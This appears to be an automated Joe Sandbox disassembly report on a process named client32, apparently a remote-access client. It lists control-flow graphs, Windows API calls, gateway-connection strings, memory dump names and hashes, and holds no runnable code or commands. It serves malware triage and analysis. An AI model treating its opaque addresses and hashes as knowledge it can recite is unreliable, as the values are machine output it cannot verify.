                                                                                                                        control_flow_graph 1599 1102d679 1600 1102d680-1102d691 1599->1600 1600->1600 1601 1102d693 1600->1601 1602 1102d7d4-1102d7ed call 1113f130 1601->1602 1605 1102d7f3-1102d7f5 1602->1605 1606 1102d670-1102d673 1602->1606 1609 1102d8f3-1102d90d call 111429e0 1605->1609 1610 1102d7fb-1102d801 1605->1610 1607 1102d675-1102d677 1606->1607 1608 1102d698-1102d6a1 1606->1608 1607->1600 1608->1602 1611 1102d6a7-1102d6ae 1608->1611 1632 1102d963-1102d96f call 1102b120 1609->1632 1633 1102d90f-1102d928 call 1105d340 1609->1633 1613 1102d803-1102d812 call 11141430 1610->1613 1614 1102d818-1102d828 1610->1614 1611->1602 1618 1102d7a3-1102d7b8 call 1115f5b7 1611->1618 1619 1102d6b5-1102d6b7 1611->1619 1620 1102d7ba-1102d7cf call 1115f5b7 1611->1620 1621 1102d74a-1102d77d call 1115e091 call 1113e8f0 1611->1621 1622 1102d78b-1102d7a1 call 11160790 1611->1622 1623 1102d73b-1102d745 1611->1623 1624 1102d77f-1102d789 1611->1624 1625 1102d6fc-1102d702 1611->1625 1626 1102d72c-1102d736 1611->1626 1613->1614 1616 1102d82a 1614->1616 1617 1102d82f-1102d84d call 1102c850 1614->1617 1616->1617 1617->1609 1651 1102d853-1102d878 call 110b6bd0 call 11142a60 1617->1651 1618->1602 1619->1602 1631 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1619->1631 1620->1602 1621->1602 1622->1602 1623->1602 1624->1602 1635 1102d704-1102d718 call 1115f5b7 1625->1635 1636 1102d71d-1102d727 1625->1636 1626->1602 1631->1602 1656 1102d971-1102d978 1632->1656 1657 1102d948-1102d94f 1632->1657 1633->1632 1654 1102d92a-1102d93c 1633->1654 1635->1602 1636->1602 1685 1102d883-1102d889 1651->1685 1686 1102d87a-1102d881 1651->1686 1654->1632 1677 1102d93e 1654->1677 1661 1102d955-1102d958 1656->1661 1664 1102d97a-1102d984 1656->1664 1657->1661 1662 1102db5a-1102db7b GetComputerNameA 1657->1662 1669 1102d95a-1102d961 call 110b6bd0 1661->1669 1670 1102d989 1661->1670 1667 1102dbb3-1102dbb9 1662->1667 1668 1102db7d-1102dbb1 call 110278a0 1662->1668 1664->1662 1674 1102dbbb-1102dbc0 1667->1674 1675 1102dbef-1102dc02 call 11160790 1667->1675 1668->1667 1703 1102dc07-1102dc13 1668->1703 1673 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1669->1673 1670->1673 1735 1102db2a-1102db32 SetLastError 1673->1735 1736 1102da6c-1102da83 1673->1736 1684 1102dbc6-1102dbca 1674->1684 1696 1102ddf7-1102de1a 1675->1696 1677->1657 1689 1102dbe6-1102dbe8 1684->1689 1690 1102dbcc-1102dbce 1684->1690 1692 1102d88b-1102d892 call 110279d0 1685->1692 1693 1102d8e9 1685->1693 1686->1609 1694 1102dbeb-1102dbed 1689->1694 1698 1102dbe2-1102dbe4 1690->1698 1699 1102dbd0-1102dbd6 1690->1699 1692->1693 1705 1102d894-1102d8c6 1692->1705 1693->1609 1694->1675 1694->1703 1711 1102de42-1102de4a 1696->1711 1712 1102de1c-1102de22 1696->1712 1698->1694 1699->1689 1704 1102dbd8-1102dbe0 1699->1704 1707 1102dc15-1102dc2a call 110b6bd0 call 11029870 1703->1707 1708 1102dc2c-1102dc3f call 11080b10 1703->1708 1704->1684 1704->1698 1722 1102d8d0-1102d8df call 110f3da0 1705->1722 1723 1102d8c8-1102d8ce 1705->1723 1739 1102dc83-1102dc9c call 11080b10 1707->1739 1728 1102dc41-1102dc64 1708->1728 1729 1102dc66-1102dc68 1708->1729 1716 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1711->1716 1717 1102de4c-1102de59 call 1113f120 call 1115e091 1711->1717 1712->1711 1721 1102de24-1102de3d call 1102cde0 1712->1721 1717->1716 1721->1711 1732 1102d8e2-1102d8e4 call 1102cde0 1722->1732 1723->1722 1723->1732 1728->1739 1731 1102dc70-1102dc81 1729->1731 1731->1731 1731->1739 1732->1693 1745 1102daf3-1102daff 1735->1745 1736->1745 1755 1102da85-1102da8e 1736->1755 1759 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1739->1759 1760 1102dddc-1102dde9 call 11160790 1739->1760 1748 1102db42-1102db51 1745->1748 1749 1102db01-1102db0d 1745->1749 1748->1662 1753 1102db53-1102db54 FreeLibrary 1748->1753 1756 1102db1f-1102db23 1749->1756 1757 1102db0f-1102db1d GetProcAddress 1749->1757 1753->1662 1755->1745 1763 1102da90-1102dac6 call 11142a60 call 11128350 1755->1763 1761 1102db34-1102db36 SetLastError 1756->1761 1762 1102db25-1102db28 1756->1762 1757->1756 1799 1102dd33-1102dd49 call 11125f90 1759->1799 1800 1102dd1f-1102dd2e call 110290f0 1759->1800 1777 1102ddec-1102ddf1 CharUpperA 1760->1777 1769 1102db3c 1761->1769 1762->1769 1763->1745 1784 1102dac8-1102daee call 11142a60 call 11027590 1763->1784 1769->1748 1777->1696 1784->1745 1804 1102dd62-1102dd9c call 110ce900 * 2 1799->1804 1805 1102dd4b-1102dd5d call 110ce900 1799->1805 1800->1799 1812 1102ddb2-1102ddda call 11160790 call 110ce4f0 1804->1812 1813 1102dd9e-1102ddad call 110290f0 1804->1813 1805->1804 1812->1777 1813->1812
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: $226546$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                        • API String ID: 1029625771-398807400
                                                                                                                        • Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                        • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                        • Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                        • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1819 685963c0-68596402 call 685b4710 EnterCriticalSection InterlockedDecrement 1822 68596408-6859641f EnterCriticalSection 1819->1822 1823 685965ed-68596608 LeaveCriticalSection call 685b28e1 1819->1823 1825 685964da-685964e0 1822->1825 1826 68596425-68596431 1822->1826 1827 685965bd-685965e8 call 685b1c50 LeaveCriticalSection 1825->1827 1828 685964e6-685964f0 shutdown 1825->1828 1830 68596443-68596447 1826->1830 1831 68596433-68596441 GetProcAddress 1826->1831 1827->1823 1832 6859650a-6859652d timeGetTime #16 1828->1832 1833 685964f2-68596507 GetLastError call 685930a0 1828->1833 1835 68596449-6859644c 1830->1835 1836 6859644e-68596450 SetLastError 1830->1836 1831->1830 1839 6859656c-6859656e 1832->1839 1840 6859652f 1832->1840 1833->1832 1837 68596456-68596465 1835->1837 1836->1837 1842 68596477-6859647b 1837->1842 1843 68596467-68596475 GetProcAddress 1837->1843 1847 68596570-6859657b closesocket 1839->1847 1845 68596551-6859656a #16 1840->1845 1846 68596531 1840->1846 1849 6859647d-68596480 1842->1849 1850 68596482-68596484 SetLastError 1842->1850 1843->1842 1845->1839 1845->1840 1846->1845 1851 68596533-6859653e GetLastError 1846->1851 1852 6859657d-6859658a WSAGetLastError 1847->1852 1853 685965b6 1847->1853 1854 6859648a-68596499 1849->1854 1850->1854 1851->1839 1855 68596540-68596547 timeGetTime 1851->1855 1856 6859658c-6859658e Sleep 1852->1856 1857 68596594-68596598 1852->1857 1853->1827 1860 685964ab-685964af 1854->1860 1861 6859649b-685964a9 GetProcAddress 1854->1861 1855->1839 1862 68596549-6859654b Sleep 1855->1862 1856->1857 1857->1847 1858 6859659a-6859659c 1857->1858 1858->1853 1863 6859659e-685965b3 GetLastError call 685930a0 1858->1863 1864 685964b1-685964be 1860->1864 1865 685964c3-685964d5 SetLastError 1860->1865 1861->1860 1862->1845 1863->1853 1864->1827 1865->1827
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
                                                                                                                        • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
                                                                                                                        • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596450
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596484
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 685964C5
                                                                                                                        • shutdown.WSOCK32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964E9
                                                                                                                        • GetLastError.KERNEL32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964F2
                                                                                                                        • timeGetTime.WINMM(?,00000001,?,00000000,?,6859D77B,00000000), ref: 68596510
                                                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596526
                                                                                                                        • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596533
                                                                                                                        • timeGetTime.WINMM(?,00000000,?,6859D77B,00000000), ref: 68596540
                                                                                                                        • Sleep.KERNEL32(00000001,?,00000000,?,6859D77B,00000000), ref: 6859654B
                                                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596563
                                                                                                                        • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596574
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859657D
                                                                                                                        • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859658E
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859659E
                                                                                                                        • _memset.LIBCMT ref: 685965C8
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                        • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                        • API String ID: 3764039262-2631155478
                                                                                                                        • Opcode ID: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
                                                                                                                        • Instruction ID: 369a002f3b48f126020b325555e63da1069fb9b65c6b3de85ce35cf1eb95a096
                                                                                                                        • Opcode Fuzzy Hash: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
                                                                                                                        • Instruction Fuzzy Hash: 46518275640340AFDB10EFA8C888B9A77F9EF89315FD14515EE1AD7280DB70E888CB95

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1869 685998d0-68599932 1870 68599934-68599955 call 685930a0 call 685b28e1 1869->1870 1871 68599956-6859995e 1869->1871 1872 68599ac5-68599acc 1871->1872 1873 68599964-68599979 call 685b28f0 1871->1873 1876 68599b19-68599b1d 1872->1876 1877 68599ace-68599adb 1872->1877 1873->1872 1887 6859997f-68599994 call 685b4330 1873->1887 1882 68599b4b-68599b70 GetTickCount InterlockedExchange EnterCriticalSection 1876->1882 1883 68599b1f-68599b26 1876->1883 1880 68599af8-68599b07 wsprintfA 1877->1880 1881 68599add-68599af6 wsprintfA 1877->1881 1888 68599b0a-68599b16 call 685952b0 1880->1888 1881->1888 1885 68599b9c-68599ba1 1882->1885 1886 68599b72-68599b9b LeaveCriticalSection call 685930a0 call 685b28e1 1882->1886 1883->1882 1889 68599b28-68599b41 call 685977b0 1883->1889 1893 68599bfb-68599c05 1885->1893 1894 68599ba3-68599bd0 call 68594dd0 1885->1894 1887->1872 1909 6859999a-685999af call 685b28f0 1887->1909 1888->1876 1889->1882 1906 68599b43-68599b45 1889->1906 1897 68599c3b-68599c47 1893->1897 1898 68599c07-68599c17 1893->1898 1917 68599d4b-68599d6c LeaveCriticalSection call 685a77e0 1894->1917 1918 68599bd6-68599bf6 WSAGetLastError call 685930a0 1894->1918 1908 68599c50-68599c5a 1897->1908 1904 68599c19-68599c1d 1898->1904 1905 68599c20-68599c22 1898->1905 1904->1905 1911 68599c1f 1904->1911 1905->1897 1912 68599c24-68599c36 call 685946c0 1905->1912 1906->1882 1914 68599d2e-68599d3b call 685930a0 1908->1914 1915 68599c60-68599c65 1908->1915 1909->1872 1927 685999b5-685999f1 1909->1927 1911->1905 1912->1897 1933 68599d45 1914->1933 1921 68599c71-68599c9a send 1915->1921 1922 68599c67-68599c6b 1915->1922 1937 68599d78-68599d8a call 685b28e1 1917->1937 1938 68599d6e-68599d72 InterlockedIncrement 1917->1938 1918->1917 1928 68599c9c-68599c9f 1921->1928 1929 68599cf1-68599d0f call 685930a0 1921->1929 1922->1914 1922->1921 1934 685999f7-685999ff 1927->1934 1935 68599cbe-68599cce WSAGetLastError 1928->1935 1936 68599ca1-68599cac 1928->1936 1929->1933 1933->1917 1941 68599aa3-68599ac2 call 685930a0 1934->1941 1942 68599a05-68599a08 1934->1942 1944 68599d11-68599d2c call 685930a0 1935->1944 1945 68599cd0-68599ce9 timeGetTime Sleep 1935->1945 1936->1933 1943 68599cb2-68599cbc 1936->1943 1938->1937 1941->1872 1950 68599a0a-68599a0c 1942->1950 1951 68599a0e 1942->1951 1943->1945 1944->1933 1945->1908 1946 68599cef 1945->1946 1946->1933 1954 68599a14-68599a1d 1950->1954 1951->1954 1955 68599a8d-68599a8e 1954->1955 1956 68599a1f-68599a22 1954->1956 1955->1941 1957 68599a24 1956->1957 1958 68599a26-68599a35 1956->1958 1957->1958 1959 68599a90-68599a93 1958->1959 1960 68599a37-68599a3a 1958->1960 1963 68599a9d 1959->1963 1961 68599a3c 1960->1961 1962 68599a3e-68599a4d 1960->1962 1961->1962 1964 68599a4f-68599a52 1962->1964 1965 68599a95-68599a98 1962->1965 1963->1941 1966 68599a54 1964->1966 1967 68599a56-68599a65 1964->1967 1965->1963 1966->1967 1968 68599a9a 1967->1968 1969 68599a67-68599a6a 1967->1969 1968->1963 1970 68599a6c 1969->1970 1971 68599a6e-68599a85 1969->1971 1970->1971 1971->1934 1972 68599a8b 1971->1972 1972->1941
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strncmp
                                                                                                                        • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                        • API String ID: 909875538-2848211065
                                                                                                                        • Opcode ID: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
                                                                                                                        • Instruction ID: 2ef811b70579311959dfd9ad39713bda9f9f37d801767944afe4c474126e2712
                                                                                                                        • Opcode Fuzzy Hash: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
                                                                                                                        • Instruction Fuzzy Hash: FCD1DD75A042559FDF20CF68CC84BEEBBB5AF4A314F8440D9D81D9B242D7319A84CF92

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1973 11028290-110282ad 1974 110282b3-110282e2 1973->1974 1975 11028978-1102897f 1973->1975 1978 11028370-110283b8 GetModuleFileNameA call 1115f9c0 call 1116076b 1974->1978 1979 110282e8-110282ee 1974->1979 1976 11028991-11028995 1975->1976 1977 11028981-1102898a 1975->1977 1981 11028997-110289a9 call 1115e4d1 1976->1981 1982 110289aa-110289be call 1115e4d1 1976->1982 1977->1976 1980 1102898c 1977->1980 1994 110283bd 1978->1994 1984 110282f0-110282f8 1979->1984 1980->1976 1984->1984 1988 110282fa-11028300 1984->1988 1989 11028303-11028308 1988->1989 1989->1989 1993 1102830a-11028314 1989->1993 1995 11028331-11028337 1993->1995 1996 11028316-1102831d 1993->1996 1997 110283c0-110283ca 1994->1997 2001 11028338-1102833e 1995->2001 2000 11028320-11028326 1996->2000 1998 110283d0-110283d3 1997->1998 1999 1102896f-11028977 1997->1999 1998->1999 2002 110283d9-110283e7 call 11026500 1998->2002 1999->1975 2000->2000 2003 11028328-1102832e 2000->2003 2001->2001 2004 11028340-1102836e call 1116076b 2001->2004 2009 110288f5-1102890a call 11160535 2002->2009 2010 110283ed-11028400 call 1115f5b7 2002->2010 2003->1995 2004->1997 2009->1999 2017 11028910-1102896a 2009->2017 2015 11028402-11028405 2010->2015 2016 1102840b-11028433 call 11026370 call 11026500 2010->2016 2015->2009 2015->2016 2016->2009 2022 11028439-11028456 call 110265f0 call 11026500 2016->2022 2017->1999 2027 11028865-1102886c 2022->2027 2028 1102845c 2022->2028 2030 11028892-11028899 2027->2030 2031 1102886e-11028871 2027->2031 2029 11028460-11028480 call 11026370 2028->2029 2041 11028482-11028485 2029->2041 2042 110284b6-110284b9 2029->2042 2032 110288b1-110288b8 2030->2032 2033 1102889b-110288a1 2030->2033 2031->2030 2035 11028873-1102887a 2031->2035 2038 110288ba-110288c5 2032->2038 2039 110288c8-110288cf 2032->2039 2037 110288a7-110288af 2033->2037 2036 11028880-11028890 2035->2036 2036->2030 2036->2036 2037->2032 2037->2037 2038->2039 2043 110288d1-110288db 2039->2043 2044 110288de-110288e5 2039->2044 2045 11028487-1102848e 2041->2045 2046 1102849e-110284a1 2041->2046 2048 1102884e-1102885f call 11026500 2042->2048 2049 110284bf-110284d2 call 111608d0 2042->2049 2043->2044 2044->2009 2047 110288e7-110288f2 2044->2047 2050 11028494-1102849c 2045->2050 2046->2048 2051 110284a7-110284b1 2046->2051 2047->2009 2048->2027 2048->2029 2049->2048 2056 110284d8-110284f4 call 11160e4e 2049->2056 2050->2046 2050->2050 2051->2048 2059 110284f6-110284fc 2056->2059 2060 1102850f-11028525 call 11160e4e 2056->2060 2061 11028500-11028508 2059->2061 2065 11028527-1102852d 2060->2065 2066 1102853f-11028555 call 11160e4e 2060->2066 2061->2061 2063 1102850a 2061->2063 2063->2048 2067 11028530-11028538 2065->2067 2071 11028557-1102855d 2066->2071 2072 1102856f-11028585 call 11160e4e 2066->2072 2067->2067 2069 1102853a 2067->2069 2069->2048 2074 11028560-11028568 2071->2074 2077 11028587-1102858d 2072->2077 2078 1102859f-110285b5 call 11160e4e 2072->2078 2074->2074 2075 1102856a 2074->2075 2075->2048 2079 11028590-11028598 2077->2079 2083 110285b7-110285bd 2078->2083 2084 110285cf-110285e5 call 11160e4e 2078->2084 2079->2079 2081 1102859a 2079->2081 2081->2048 2085 110285c0-110285c8 2083->2085 2089 110285e7-110285ed 2084->2089 2090 110285ff-11028615 call 11160e4e 2084->2090 2085->2085 2087 110285ca 2085->2087 2087->2048 2091 110285f0-110285f8 2089->2091 2095 11028617-1102861d 2090->2095 2096 1102862f-11028645 call 11160e4e 2090->2096 2091->2091 2093 110285fa 2091->2093 2093->2048 2097 11028620-11028628 2095->2097 2101 11028647-1102864d 2096->2101 2102 1102865f-11028675 call 11160e4e 2096->2102 2097->2097 2099 1102862a 2097->2099 2099->2048 2104 11028650-11028658 2101->2104 2107 11028677-1102867d 2102->2107 2108 1102868f-110286a5 call 11160e4e 2102->2108 2104->2104 2106 1102865a 2104->2106 2106->2048 2109 11028680-11028688 2107->2109 2113 110286a7-110286ad 2108->2113 2114 110286bf-110286d5 call 11160e4e 2108->2114 2109->2109 2111 1102868a 2109->2111 2111->2048 2115 110286b0-110286b8 2113->2115 2119 110286d7-110286dd 2114->2119 2120 110286ef-11028705 call 11160e4e 2114->2120 2115->2115 2117 110286ba 2115->2117 2117->2048 2122 110286e0-110286e8 2119->2122 2125 11028726-1102873c call 11160e4e 2120->2125 2126 11028707-1102870d 2120->2126 2122->2122 2123 110286ea 2122->2123 2123->2048 2131 11028753-11028769 call 11160e4e 2125->2131 2132 1102873e 2125->2132 2127 11028717-1102871f 2126->2127 2127->2127 2129 11028721 2127->2129 2129->2048 2137 11028780-11028796 call 11160e4e 2131->2137 2138 1102876b 2131->2138 2133 11028744-1102874c 2132->2133 2133->2133 2135 1102874e 2133->2135 2135->2048 2143 110287b7-110287cd call 11160e4e 2137->2143 2144 11028798-1102879e 2137->2144 2139 11028771-11028779 2138->2139 2139->2139 2141 1102877b 2139->2141 2141->2048 2149 110287ef-11028805 call 11160e4e 2143->2149 2150 110287cf-110287df 2143->2150 2145 110287a8-110287b0 2144->2145 2145->2145 2147 110287b2 2145->2147 2147->2048 2155 11028807-1102880d 2149->2155 2156 1102881c-11028832 call 11160e4e 2149->2156 2152 110287e0-110287e8 2150->2152 2152->2152 2154 110287ea 2152->2154 2154->2048 2157 11028810-11028818 2155->2157 2156->2048 2161 11028834-1102883a 2156->2161 2157->2157 2159 1102881a 2157->2159 2159->2048 2162 11028844-1102884c 2161->2162 2162->2048 2162->2162
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74591370,?,0000001A), ref: 1102837D
                                                                                                                        • _strrchr.LIBCMT ref: 1102838C
                                                                                                                          • Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                        • API String ID: 1609618855-357498123
                                                                                                                        • Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
